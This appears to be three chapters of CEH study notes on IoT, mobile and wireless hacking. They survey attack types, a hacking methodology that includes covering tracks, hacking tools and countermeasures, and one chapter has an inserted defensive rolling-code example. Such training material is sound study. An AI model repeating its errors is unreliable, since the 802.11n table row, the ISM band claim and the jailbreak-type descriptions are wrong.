CEH (XIX): IoT Hacking

The index of this series of articles can be found here.

IoT is the concept of basically connecting any device with an on and off switch to the Internet (and/or to each other). This includes everything from cellphones, coffee makers, washing machines, headphones, lamps, wearable devices and almost anything else you can think of. This also applies to components of machines, for example, a jet engine of an aeroplane or the drill of an oil rig. As I mentioned, if it has an on and off switch then chances are it can be a part of the IoT.

On a broader scale, the IoT can be applied to things like transportation networks: “smart cities” which can help us reduce waste and improve efficiency for things such as energy use, helping us understand and improve how we work and live. Take a look at the visual below to see what something like that can look like.

The architecture of IoT depends upon five layers which are:

  • Application layer: Layer responsible for delivering the data to the users. This is the user interface to control, manage and command IoT devices.
  • Middleware layer: It is for device and information management.
  • Internet layer: It is responsible for end-points connectivity.
  • Access gateway layer: It is responsible for protocol transmission and messaging.
  • Edge technology layer: It covers IoT capable devices.

IoT Communication Models

There are several ways in which IoT devices can communicate. The following are some of these models:

  • Device-to-Device Model: It is a basic model where two devices talk to each other without involving any other device. Communication is established using some kind of wireless connection. Wi-Fi, Bluetooth, NFC or RFID can be examples of this model.
  • Device-to-Cloud Model: In this model, IoT devices communicate with each other through an application server. For example, manufacturing environments where a typically large number of sensors send information to a server. Application servers process the data and perform automated actions based on that analysis.
  • Device-to-Gateway Model: Similar to the Device-to-Cloud model, but an IoT gateway is added. The function of this gateway is to collect the data from the devices and send it to a remote application server. In addition, it offers a consolidated point where it can be checked that the data is flowing. Plus, it can provide security and protocol translation functionalities.
  • Back-End Data-sharing Model: This model extends the Device-to-Cloud model to a scalable scenario where multiple parties can access and control IoT devices and sensors. In this model, IoT devices communicate with an application server too.

Understanding IoT Attacks

In addition to traditional attacks, other major challenges can be found in IoT environments:

  • Lack of security
  • Vulnerable interfaces
  • Physical security risk
  • Lack of vendor support
  • Difficulties to update firmware and OS
  • Interoperability issues

The latest version of the OWASP IoT Top 10 defines the following vulnerabilities:

  • Weak, Guessable, or Hardcoded Password: Use of easily brute-forced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grant unauthorized access to deployed systems.
  • Insecure Network Services: Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.
  • Insecure Ecosystem Interfaces: Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allow compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.
  • Lack of Secure Update Mechanism: Lack of ability to securely update the device. This includes lack of firmware validation on devices, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.
  • Use of Insecure or Outdated Components: Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms and the use of third-party software or hardware components from a compromised supply chain.
  • Insufficient Privacy Protection: User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.
  • Insecure Data Transfer and Storage: Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.
  • Lack of Device Management: Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.
  • Insecure Default Settings: Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations.
  • Lack of Physical Hardening: Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.

IoT Attack Areas

The following are the most common attack areas for IoT networks:

  • Device memory containing credentials
  • Access control
  • Firmware extraction
  • Privileges escalation
  • Resetting to an insecure state
  • Removal of storage media
  • Web attack
  • Firmware attacks
  • Network services attacks
  • Unencrypted local data storage
  • Confidentiality and integrity issues
  • Cloud computing attacks
  • Malicious updates
  • Insecure APIs
  • Mobile application threats

IoT Attacks

  • DDoS attacks: Using this technique all the services associated with an IoT network can be targeted: devices, gateways and application servers.
  • Rolling code attacks: Rolling code or code hopping is another technique where the attacker captures the code, sequence or signal coming from transmitter devices and simultaneously blocks the receivers. The code will be used later to gain unauthorised access. For example, the opening signal of a car can be recorded and replayed later.
  • BlueBorne attacks: It is the use of different techniques to exploit Bluetooth vulnerabilities to gain unauthorised access.
  • Jamming attack: Jamming a signal to prevent devices from communicating.
  • Backdoor: Deploying a backdoor on a computer of an employee or victim to gain access to the IoT network. Tricks do not always need to be applied to the IoT devices themselves.
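To make the rolling-code point concrete from the receiver's side, here is an added example (not code from the original article) of how a rolling-code receiver validates codes with a monotonically increasing counter and a small look-ahead window, so that a previously captured code is rejected once consumed. The shared key, counter width, window size and HMAC construction are assumptions for the demo, not a particular vendor's scheme.

```python
import hashlib
import hmac

# Constructed demo key; a real key fob and receiver would share a per-device secret.
SHARED_KEY = b"constructed-demo-key"


def make_code(key: bytes, counter: int) -> bytes:
    """Transmitter side: derive the rolling code for a given counter value.

    The code is an HMAC of the counter, truncated to 8 bytes (assumed scheme).
    """
    return hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:8]


class RollingCodeReceiver:
    """Receiver side: accepts a code only if its counter is ahead of the last
    accepted one and within a small look-ahead window (assumed window of 16)."""

    def __init__(self, key: bytes, window: int = 16):
        self.key = key
        self.window = window
        self.last_counter = 0  # highest counter value accepted so far

    def validate(self, code: bytes) -> bool:
        """Try every counter in (last, last + window]; on a match, consume it.

        Codes at or below last_counter are never recomputed, so a replay of an
        already-used code fails. Codes beyond the window also fail (desync).
        """
        lo = self.last_counter + 1
        hi = self.last_counter + self.window
        for candidate in range(lo, hi + 1):
            expected = make_code(self.key, candidate)
            if hmac.compare_digest(code, expected):
                self.last_counter = candidate  # advance: this code is now consumed
                return True
        return False


def demo() -> dict:
    """Walk through the cases a defender cares about and return the outcomes."""
    fob_counter = 0
    rx = RollingCodeReceiver(SHARED_KEY)
    results = {}

    # 1. Normal button press: the receiver hears it and advances its counter.
    fob_counter += 1
    c1 = make_code(SHARED_KEY, fob_counter)
    results["first_press"] = rx.validate(c1)

    # 2. Replaying the same captured code: counter 1 is already consumed.
    results["replay_used_code"] = rx.validate(c1)

    # 3. A press the receiver never heard (e.g. signal blocked): only the fob advances.
    fob_counter += 1
    c2_unheard = make_code(SHARED_KEY, fob_counter)

    # 4. The next press is heard; the window lets the receiver skip the missed counter.
    fob_counter += 1
    c3 = make_code(SHARED_KEY, fob_counter)
    results["press_after_missed"] = rx.validate(c3)

    # 5. The earlier, never-received code is now behind the counter and is rejected.
    results["stale_unheard_code"] = rx.validate(c2_unheard)

    # 6. A code far beyond the window is rejected; a resync procedure would be needed.
    results["out_of_window"] = rx.validate(make_code(SHARED_KEY, fob_counter + 100))
    return results


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

The window is what keeps a fob usable after out-of-range presses, but it also means a code the receiver never heard stays valid until a later one is accepted; keeping the window small and pairing it with a resync step limits that exposure.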

Other general attacks are:

  • Eavesdropping
  • Sybil attack
  • Exploit kits
  • MitM attacks
  • Replay attacks
  • Forged malicious devices
  • Side-channel attack
  • Ransomware attack

IoT Hacking Methodology

The methodology applied to IoT platforms is the same as the one applied to other platforms.

  • Information gathering: IP addresses, running protocols, open ports, type of devices, vendor’s information, etc. Shodan, Censys and Thingful are search engines to find information about IoT devices. Shodan is a great tool for discovering and gathering information from IoT devices deployed around the world.
  • Vulnerability scanner: Scanning network and devices looking for vulnerabilities, weak passwords, software and firmware bugs, default configurations, etc. Nmap and others are very helpful tools.
  • Launch attack: Exploiting the vulnerabilities using different attacks like DDoS, Rolling code, jamming, etc. RFCrack, Attify Zigbee and HackRF One are popular tools for hacking.
  • Gain access: Taking control over an IoT environment. Gaining access, escalating privileges, and backdoor installation are included in this phase among others.
  • Maintain attack: Includes logging out without being detected, clearing logs and covering tracks.

Countermeasures

Countermeasures include:

  • Firmware updates
  • Block unnecessary ports
  • Disable telnet
  • Use encrypted communication such as SSL/TLS
  • Use strong passwords
  • Use encryption in drivers
  • User account lockout
  • Periodic assessment of devices
  • Secure password recovery
  • Two-factor authentication
  • Disable UPnP

CEH (XVIII): Hacking Mobile Platforms

The index of this series of articles can be found here.

Mobile phones are nowadays everywhere. They are used for entertainment, work, personal finances and services, almost anything we can imagine. In addition, there is a big variety of systems in the market running on these mobile devices, such as iOS, Blackberry OS, Android, Symbian, Windows, etc.

For all these reasons, these mobile devices must have strong security, and not just a feeling of being secure, to protect their users and all the private information they store. Plus, with the Bring Your Own Device philosophy, devices can cause multiple problems in corporate environments and networks.

Mobile Platform Attack Vectors

The OWASP project publishes an unbiased and practical list of the top 10 most common attacks on mobile platforms:

Top 10 (2016)              | Top 10 (2014)
Improper Platform Usage    | Weak Server Side Controls
Insecure Data Storage      | Insecure Data Storage
Insecure Communication     | Insufficient Transport Layer Protection
Insecure Authentication    | Unintended Data Leakage
Insufficient Cryptography  | Poor Authorization and Authentication
Insecure Authorization     | Broken Cryptography
Client Code Quality        | Client-Side Injection
Code Tampering             | Security Decisions Via Untrusted Inputs
Reverse Engineering        | Improper Session Handling
Extraneous Functionality   | Lack of Binary Protections

More information can be found at the project’s page OWASP Mobile Top 10.

Mobile Attack Vector

There are several threats and attacks on mobile devices. Some of the most basic examples are malware, data loss, integrity attacks, social engineering attacks, etc. Mobile attack vectors include:

  • Malware
  • Data loss
  • Data Tampering
  • Data Exfiltration

Vulnerabilities and Risks on Mobile Platforms

Some of the risks for mobile platforms are:

  • Malicious third-party applications
  • Malicious applications on Store
  • Malware and rootkits
  • Application vulnerabilities
  • Data security
  • Excessive permissions
  • Weak encryption
  • Operating system update issues
  • Application updates issues
  • Jailbreak and rooting
  • Physical attacks

Application Sandbox Issue

Application sandboxing, also called application containerization, is an approach to software development and mobile application management (MAM) that limits the environments in which certain code can execute.

The goal of sandboxing is to improve security by isolating an application to prevent outside malware, intruders, system resources or other applications from interacting with the protected app. The term sandboxing comes from the idea of a child’s sandbox, in which the sand and toys are kept inside a small container or walled area.

Application sandboxing is controversial because its complexity can cause more security problems than the sandbox was originally designed to prevent. The sandbox has to contain all the files the application needs to execute, which can also create problems between applications that need to interact with one another. Still, it is one of the best security methods to be used when developing for mobile devices.

However, advanced malicious applications can be designed to bypass the sandbox technology. Fragmented code and sleep timers are common techniques adopted by attackers to bypass the inspection process.

Mobile Spam and Phishing

Mobile devices and technologies are just another path attackers can choose to send emails or messages spamming users or trying to convince them to click and access malicious links searching for credentials or information.

Open Wi-Fi and Bluetooth Networks

Public or unencrypted Wi-Fi or Bluetooth networks are another easy way for attackers to intercept communications and reveal information.

Hacking Android OS

Android is an operating system developed by Google for smartphones. It is not only present in smartphones: it can also be found in other devices like gaming consoles, PCs and IoT devices. Android OS brings flexible features with an open-source platform.

Android OS has very wide support for and integration with different hardware and services, which is one of its major features, and it receives periodic updates.

One of its most successful features is also one of the major security flaws of Android devices: the flexibility to install third-party apps not just from trusted stores but also applications (APKs) from other sources on the Internet.

Device Administration API

In version 2.2 of the Android OS the Device Administration API was introduced to ensure the administration of the device at the system level and to offer control over Android devices within a corporate network. Using this security-aware API, administrators can perform several actions, including wiping the device remotely or managing installed applications.

Root Access / Android Rooting

Rooting is basically the process of gaining privileged control over a device, commonly known as root access. As in any other Linux kernel-based system, root access gives superuser permissions. These permissions allow modifying the system settings and configurations and overcoming limitations and restrictions. The rooting process can be used for malicious intentions such as the installation of malicious applications, analysing custom firmware or giving unnecessary permissions to applications.

Android stack

Android Phone Security Tools

There are multiple Android security tools that can be found in the stores but, when installing them, users need to keep in mind and be sure of their authenticity and that the companies or developers behind them are legitimate.

Hacking iOS

iOS is the operating system developed by Apple for their iPhones, and nowadays it can be found in other devices of the company like iPads and iPods. Together with Android, they are the two most popular operating systems for mobile devices.

Major versions of the operating system tend to be released yearly. Two of the major security improvements iOS brings to the table are hardware-accelerated encryption and application isolation, where one application cannot access another application’s data.

iOS Jailbreak

A jailbreak is a form of rooting resulting in privilege escalation. Jailbreaking is usually done to remove or bypass the factory default restrictions by using kernel patches or device customisation. A jailbreak allows root access to the device, which allows users to install unofficial applications.

Types of Jailbreak

  • Userland exploits: This jailbreak allows user-level access without escalating to boot-level access.
  • iBoot exploits: This jailbreak allows user-level and boot-level access.
  • Bootrom exploits: This jailbreak allows user-level and boot-level access.

Jailbreak Techniques

  • Tethered Jailbreak: A tethered jailbreak is one that temporarily pwns a handset for a single boot. After the device is turned off (or the battery dies), it cannot complete a boot cycle without the help of a computer-based jailbreak application and a physical cable connection between the device and the computer in question.
  • Semi-tethered Jailbreak: A semi-tethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a computer-based jailbreak application is deployed over a physical cable connection between the device and the computer in question.
  • Semi-untethered Jailbreak: A semi-untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a side-loaded jailbreak app on the device itself is deployed.
  • Untethered Jailbreak: An untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned without any interruption to jailbreak-oriented functionality.

Jailbreak Tools

There are multiple jailbreak tools such as:

  • Pangu
  • evasi0n7
  • limera1n
  • blackra1n

Hacking Windows Phone OS

Windows Phone OS is another mobile operating system developed by Microsoft. Windows Phone 8 is the second generation of the Windows Phone mobile operating system from Microsoft. It was released on October 29, 2012, and, like its predecessor, it features a flat user interface based on the Metro design language. It was succeeded by Windows Phone 8.1, which was unveiled on April 2, 2014.

Windows Phone 8 replaces the Windows CE-based architecture used in Windows Phone 7 with the Windows NT kernel found in Windows 8. Current Windows Phone 7 devices cannot run or update to Windows Phone 8, and new applications compiled specifically for Windows Phone 8 are not made available for Windows Phone 7 devices. Developers can make their apps available on both Windows Phone 7 and Windows Phone 8 devices by targeting both platforms via the proper SDKs in Visual Studio.

Windows Phone 8 devices are manufactured by Microsoft Mobile (formerly Nokia), HTC, Samsung and Huawei.

Some features supported are:

  • Native code support (C++)
  • NFC
  • Remote device management
  • VoIP and video chat integration
  • UEFI and firmware over the air for Windows Phone updates
  • App sandboxing

Hacking BlackBerry

BlackBerry OS is a proprietary mobile operating system designed specifically for Research In Motion’s (RIM) BlackBerry devices. The BlackBerry OS runs on Blackberry variant phones.

The BlackBerry OS is designed for smartphone environments and is best known for its robust support for push Internet email, and BlackBerry devices were considered among the most prominent and secure mobile phones.

Traditionally, BlackBerry applications are written using Java, particularly the Java Micro Edition (Java ME) platform. However, RIM introduced the BlackBerry Web development platform in 2010, which makes use of the widget software development kit (SDK) to create small standalone Web apps made up of HTML, CSS and JavaScript code.

BlackBerry Attack Vectors

  • Malicious code signing: It is the process where an attacker, after obtaining a code-signing key from the code-signing service, signs a malicious application and uploads it to the BlackBerry App Store to be distributed to users.
  • JAD file exploits: JAD stands for Java Application Descriptor file. Files with the .jad extension are descriptor files that are commonly used to describe the contents of a MIDlet created for the Java ME virtual machine. Attackers can trick users into installing malicious .jad files pointing to malicious download links to obtain an application or, even, they can be crafted to run DoS attacks.

Mobile Device Management (MDM)

Mobile device management (MDM), is the process of managing everything about a mobile device. MDM includes storing essential information about mobile devices, deciding which apps can be present on the devices, locating devices, and securing devices if lost or stolen. Many businesses use a third-party mobile device management software such as Mobile Device Manager Plus to manage mobile devices. Mobile Device Management has expanded its horizons to evolve into Enterprise Mobility Management (EMM).

Mobile devices now have more capabilities than ever before, which has ultimately led to many enterprises adopting a mobile-only or mobile-first workforce. In these types of environments, both personal (BYOD) and corporate-owned mobile devices are the primary devices used for accessing or interacting with corporate data.

Mobile Device Management (MDM) is important for enterprises focusing on improving productivity and security. It allows:

  • Ease deployments
  • Efficient Integrations
  • Manage multiple device types
  • Achieve compliance
  • Enhanced security
  • Remote management

And provide some functions such as:

  • Enforcing a device to be locked after certain login failures.
  • Enforcement of strong password policies for all BYOD devices.
  • MDM can detect any attempt of hacking on BYOD devices and limit their network access for those affected devices.
  • Enforcing confidentiality by using encryption as per organizations policy.
  • Administration and implementation of Data Loss Prevention (DLP) for BYOD devices.

MDM Deployment Methods

Generally, there are two types of deployments:

On-site MDM Deployment

Involves the installation of MDM applications on local servers inside the corporate data centres or offices, and it is managed by local staff available on-premises.

The major advantage is the granular control over the management of the BYOD devices, which, to some extent, extends the security.

The on-site MDM deployment has the next components or areas:

  • Data centre: All the necessary services and servers to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. It includes firewalls, filters and monitors for ingress and egress traffic, and wireless controllers and access points for guest users.
  • Services layer: Contain wireless controllers and access points used by users in the corporate environment. And sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Campus Building: A distribution layer that acts as ingress/egress point for all traffic in a campus building, where users can connect using switches or wireless access points.

Cloud-based MDM deployment

In this type of deployment, the MDM software is installed and managed by a third-party service and, this is one of the best advantages of this type due to the maintenance and troubleshooting been the responsibility of the service provider.

The cloud-based MDM deployment has the next components or areas:

  • Data centre: All the necessary services and servers to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. It includes firewalls, filters and monitors for ingress and egress traffic, and wireless controllers and access points for guest users.
  • WAN: Provides VPN connectivity from branch offices to the corporate office, internet access from branch offices and connectivity to cloud-based MDM application software. Maintains policies and configurations for BYOD devices connected to the corporate network.
  • WAN edge: This component acts as a focal point for all ingress/egress WAN traffic coming from and going to branch offices.
  • Services layer: Contain wireless controllers and access points used by users in the corporate environment. And sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Branch offices: This component is composed of a few routers acting as the focal point of ingress and egress traffic out of branch offices. Users can connect using access switches or wireless access points.

Bring Your Own Device (BYOD)

The BYOD concept makes life easier for users but represents some new challenges for network engineers and designers. Network engineers and designers need to find a way to balance the constant mutation of their networks and the offering of seamless wireless connectivity with maintaining good security for organisations.

Some reasons to implement BYOD solutions are:

  • A wide variety of consumer devices: Smartphones, tablets, laptops and others of multiple brands and types belonging to users need to be, nowadays, added to the network, and they need to comply with the organisation’s policies and, of course, have all the connectivity.
  • No schedules: No more strict working hours; users can join a network when it is convenient for them: early, late, lunch time, even weekends.
  • Delocalisation: Not just working from office buildings or corporate environments, users can now connect from everywhere and need to access the company resources.

BYOD Architecture Framework

Some elements that can be found in BYOD environments are:

  • BYOD devices: All the devices allowed to connect to the corporate network to allow users to perform their job.
  • Wireless access points: They provide wireless connectivity on-premises and they are installed in the physical network of a company.
  • Wireless LAN controllers: WLAN controllers provide centralised management and monitoring of the WLAN solution. They are integrated with the identity service engine to enforce the authentication and authorisation of the BYOD devices.
  • Identity service engine: They implement the authentication, authorisation and accounting for end-point devices.
  • VPN solutions: They provide connectivity to corporate networks for end-users allowing confidentiality of data.
  • Integrated services router (ISR): Preferred in BYOD architectures to provide WAN and Internet access in corporate environments to BYOD devices.
  • Aggregation services router (ASR): It provides WAN and Internet access in corporate environments and acts as an aggregation point for connections coming from the branches and home offices.
  • Cloud web security (CWS): It provides enhanced web security for all BYOD devices that access the Internet using public 3G/4G networks.
  • Adaptive security appliance (ASA): It provides standard security solutions at the Internet edge like IDS or IPS and acts as a termination point for the VPN connections.
  • RSA SecurID: It provides one-time passwords to access network applications for BYOD devices.
  • Active Directory: It provides central command and control of domain users, computers and network printers. It restricts access to network resources.
  • Certificate authority: It allows to provide access to the network only to BYOD devices that have a valid certificate installed.

Mobile Security Guidelines

Mobile devices have a large number of built-in security features and measures; these, together with the tools available on the Stores, can provide good security. In addition, some beneficial guidelines to secure mobile phones are as follows:

  • Avoid auto-upload of files and photos.
  • Perform security assessments of applications.
  • Turn off the Bluetooth.
  • Allow only necessary GPS-enabled applications.
  • Do not connect to open networks or public networks unless it is necessary.
  • Install applications from trusted or official stores.
  • Configure strong passwords.
  • Use mobile device management software.
  • Use remote wipe services.
  • Update operating systems.
  • Do not allow rooting/jailbreaking.
  • Encrypt your phone.
  • Periodic backups.
  • Filter emails.
  • Configure application certification rules.
  • Configure mobile device policies.
  • Configure auto-lock.

CEH (XVII): Hacking Wireless Networks

The index of this series of articles can be found here.

A wireless network allows devices to stay connected to the network but roam untethered to any wires. Access points amplify Wi-Fi signals, so a device can be far from a router but still be connected to the network. Previously it was thought that wired networks were faster and more secure than wireless networks. But continual enhancements to wireless network technology such as the Wi-Fi 6 networking standard have eroded speed and security differences between wired and wireless networks.

Usually, wireless communications rely on radio communications. Different frequency ranges are used for different types of wireless technologies depending upon the requirements.

Wireless Terminology

GSM

GSM (Global System for Mobile communications) is an open, digital cellular technology used for transmitting mobile voice and data services. GSM supports voice calls and data transfer speeds of up to 9.6 kbps, together with the transmission of SMS (Short Message Service).

GSM operates in the 900MHz and 1.8GHz bands in Europe and the 1.9GHz and 850MHz bands in the US. GSM services are also transmitted via 850MHz spectrum in Australia, Canada and many Latin American countries. The use of harmonised spectrum across most of the globe, combined with GSM’s international roaming capability, allows travellers to access the same mobile services at home and abroad. GSM enables individuals to be reached via the same mobile number in up to 219 countries.

Terrestrial GSM networks now cover more than 90% of the world’s population. GSM satellite roaming has also extended service access to areas where terrestrial coverage is not available.

Access Point

A wireless access point (WAP), or more generally just access point (AP), is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. The AP usually connects to a router (via a wired network) as a standalone device, but it can also be an integral component of the router itself. An AP is differentiated from a hotspot which is a physical location where Wi-Fi access is available.

SSID

A Wi-Fi network’s SSID is the technical term for its network name. SSID stands for “Service Set Identifier”. Under the IEEE 802.11 wireless networking standard, a “service set” refers to a collection of wireless networking devices with the same parameters. So, the SSID is the identifier (name) that tells you which service set (or network) to join.

BSSID

The BSSID is the MAC address of the wireless access point (WAP) generated by combining the 24-bit Organization Unique Identifier (the manufacturer’s identity) and the manufacturer’s assigned 24-bit identifier for the radio chipset in the WAP.

ISM Band

The Industrial, Scientific and Medical band is a part of the radio spectrum that can be used for any purpose without a license in most countries. The 902-928 MHz, 2.4 GHz and 5.7-5.8 GHz bands are used for machines that emit radio frequencies, industrial heaters and microwave ovens, but not for radio communications.

Orthogonal Frequency Division Multiplexing (OFDM)

Orthogonal Frequency Division Multiplexing is a digital transmission technique that uses a large number of carriers spaced apart at slightly different frequencies. First promoted in the early 1990s for wireless LANs, OFDM is used in many wireless applications including Wi-Fi, WiMAX, LTE, ultra-wideband (UMB), as well as digital radio and TV broadcasting in Europe and Japan. It is also used in land-based ADSL (see OFDMA).

Frequency-hopping Spread Spectrum (FHSS)

Frequency-hopping spread spectrum (FHSS) is a method of transmitting radio signals by rapidly changing the carrier frequency among many distinct frequencies occupying a large spectral band. The changes are controlled by a code known to both transmitter and receiver. FHSS is used to avoid interference, to prevent eavesdropping, and to enable code-division multiple access (CDMA) communications.

Types of Networks

Types of wireless networks deployed in a geographical area can be categorised as:

  • Wireless personal area network (WPAN)
  • Wireless local area network (WLAN)
  • Wireless metropolitan area network (WMAN)
  • Wireless wide area network (WWAN)

However, a wireless network can be defined in different types depending upon the deployment scenarios. The following are some of the wireless network types that are used in different scenarios:

  • Extension to a wired network
  • Multiple access points
  • 3G/4G hotspot

Wireless Standards

Standard        | Frequency    | Modulation  | Speed
802.11a         | 5 GHz        | OFDM        | 54 Mbps
802.11b         | 2.4 GHz      | DSSS        | 11 Mbps
802.11g         | 2.4 GHz      | OFDM, DSSS  | 54 Mbps
802.11n         | 5 GHz        | OFDM        | 54 Mbps
802.16 (WiMAX)  | 10 – 66 GHz  | OFDM        | 70 – 1000 Mbps
Bluetooth       | 2.4 GHz      |             | 1 – 3 Mbps

Wi-Fi

Wi-Fi is a family of wireless networking technologies, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access. Wi‑Fi is a trademark of the non-profit Wi-Fi Alliance, which restricts the use of the term Wi-Fi Certified to products that successfully complete interoperability certification testing.

They transmit at 2.4 GHz or 5 GHz. These frequencies are higher than those used by most cell phones, walkie-talkies and television broadcasts, and the wide channels available there (20 MHz and up) let the signal carry more data, at the cost of shorter range and poorer penetration through walls.

They use 802.11 networking standards, which come in several flavours:

  • 802.11a transmits at 5 GHz and can move up to 54 megabits of data per second. It also uses orthogonal frequency-division multiplexing (OFDM), a more efficient coding technique that splits that radio signal into several sub-signals before they reach a receiver. This greatly reduces interference.
  • 802.11b is the slowest and least expensive standard. For a while, its cost made it popular, but now it is becoming less common as faster standards become less expensive. 802.11b transmits in the 2.4 GHz frequency band of the radio spectrum. It can handle up to 11 megabits of data per second, and it uses complementary code keying (CCK) modulation to improve speeds.
  • 802.11g transmits at 2.4 GHz like 802.11b, but it is a lot faster – it can handle up to 54 megabits of data per second. 802.11g is faster because it uses the same OFDM coding as 802.11a.
  • 802.11n is the most widely available of the standards and is backwards compatible with a, b and g. It significantly improved speed and range over its predecessors. For instance, although 802.11g theoretically moves 54 megabits of data per second, it only achieves real-world speeds of about 24 megabits of data per second because of network congestion. 802.11n, however, reportedly can achieve speeds as high as 140 megabits per second. 802.11n can transmit up to four streams of data, each at a maximum of 150 megabits per second, but most routers only allow for two or three streams.
  • 802.11ac was the newest standard as of early 2013, when it was still in draft form at the Institute of Electrical and Electronics Engineers (IEEE) and not yet widely adopted, although devices supporting it were already on the market (it was ratified in December 2013). 802.11ac is backwards compatible with 802.11n (and therefore the others, too), with n on the 2.4 GHz band and ac on the 5 GHz band. It is less prone to interference and far faster than its predecessors, reaching about 433 megabits per second on a single stream with an 80 MHz channel, although real-world speeds are lower. Like 802.11n, it allows for transmission on multiple spatial streams, up to eight optionally. It is sometimes called 5G WiFi because of its frequency band, sometimes Gigabit WiFi because of its potential to exceed a gigabit per second on multiple streams and sometimes Very High Throughput (VHT) for the same reason.

Wi-Fi Authentication Modes

There are different authentication methods for WiFi-based networks:

Open Authentication to the Access Point

Open authentication allows any device to authenticate and then attempt to communicate with the access point. Using open authentication, any wireless device can authenticate with the access point, but the device can communicate only if its Wired Equivalent Privacy (WEP) keys match the access point's WEP keys. Devices that are not using WEP do not attempt to authenticate with an access point that is using WEP. Open authentication does not rely on a RADIUS server on your network.

Shared Key Authentication to the Access Point

During shared key authentication, the access point sends an unencrypted challenge text string to any device that is attempting to communicate with the access point. The device that is requesting authentication encrypts the challenge text and sends it back to the access point. If the challenge text is encrypted correctly, the access point allows the requesting device to authenticate.

Both the unencrypted challenge and the encrypted challenge can be monitored, however, which leaves the access point open to attack from an intruder who calculates the WEP key by comparing the unencrypted and encrypted text strings. Because of this vulnerability to attack, shared key authentication can be less secure than open authentication. Like open authentication, shared key authentication does not rely on a RADIUS server on your network.

EAP Authentication to the Network

This authentication type provides the strongest security of the four modes. By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication and derive a dynamic unicast WEP key. The RADIUS server sends the WEP key to the access point, which uses the key for all unicast data it sends to or receives from the client. The access point also encrypts its broadcast WEP key (which is entered in the access point's WEP key slot 1) with the client's unicast key and sends it to the client. Note that this describes the original "dynamic WEP" design: per-session keys limit the damage, but the cipher is still WEP. The same EAP/RADIUS mutual authentication is what WPA and WPA2 Enterprise (802.1X) use today to derive the pairwise master key, and that is the form in which it should be deployed.

MAC Address Authentication to the Network

The access point relays the wireless client device's MAC address to a RADIUS server on your network, and the server checks the address against a list of allowed MAC addresses. Because intruders can trivially spoof MAC addresses (they are sent in clear in every frame), MAC-based authentication is less secure than EAP authentication. However, MAC-based authentication provides an alternate authentication method for client devices that do not have EAP capability.

Combining MAC-Based, EAP, and Open Authentication

You can set up the access point to authenticate client devices that use a combination of MAC-based and EAP authentication. When you enable this feature, client devices that use 802.11 open authentication to associate to the access point first attempt MAC authentication. If MAC authentication succeeds, the client device joins the network. If MAC authentication fails, EAP authentication takes place.

Using WPA Key Management

Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly increases the level of data protection and access control for existing and future wireless LAN systems. It was derived from, and designed to be forward-compatible with, the IEEE 802.11i standard, which was still being finalised when WPA shipped (802.11i was ratified in 2004 and became the basis of WPA2). WPA leverages TKIP (Temporal Key Integrity Protocol) for data protection and 802.1X for authenticated key management.

WPA key management supports two mutually exclusive modes: WPA (often called WPA-Enterprise) and WPA-Pre-shared key (WPA-PSK, or WPA-Personal). Using WPA key management, clients and the authentication server authenticate to each other using an EAP authentication method, and the client and server generate a pairwise master key (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that pre-shared key is used as the PMK. In either case the PMK is never sent over the air: the four-way handshake that follows derives the per-session pairwise transient key (PTK) from the PMK, the two MAC addresses and two nonces.

Wi-Fi Chalking

Wi-Fi Chalking covers several methods of detecting and advertising open wireless networks; some of them are:

  • WarWalking: Walking around to detect open networks.
  • WarChalking: Using symbols and signs to advertise open wireless networks.
  • WarFlying: Detection of open wireless networks from aircraft or drones.
  • WarDriving: Driving around to detect open wireless networks.

Types of Wireless Antennas

  • Directional Antenna: Directional antennas, as the name implies, focus the wireless signal in a specific direction resulting in a limited coverage area. An analogy for the radiation pattern would be how a vehicle headlight illuminates the road. Types of Directional antennas include Yagi, Parabolic grid, patch and panel antennas.
  • Omni-Directional: Omni-directional antennas provide a 360º doughnut-shaped radiation pattern to provide the widest possible signal coverage in indoor and outdoor wireless applications. An analogy for the radiation pattern would be how an un-shaded incandescent light bulb illuminates a room. Types of Omni-directional antennas include “rubber duck” antennas often found on access points and routers, Omni antennas found outdoors, and antenna arrays used on cellular towers.
  • Parabolic Antenna: A parabolic antenna is an antenna that uses a parabolic reflector, a curved surface with the cross-sectional shape of a parabola, to direct the radio waves. The most common form is shaped like a dish and is popularly called a dish antenna or parabolic dish.
  • Yagi Antenna: A Yagi–Uda antenna, commonly known as a Yagi antenna, is a directional antenna consisting of multiple parallel elements in a line, usually half-wave dipoles made of metal rods.
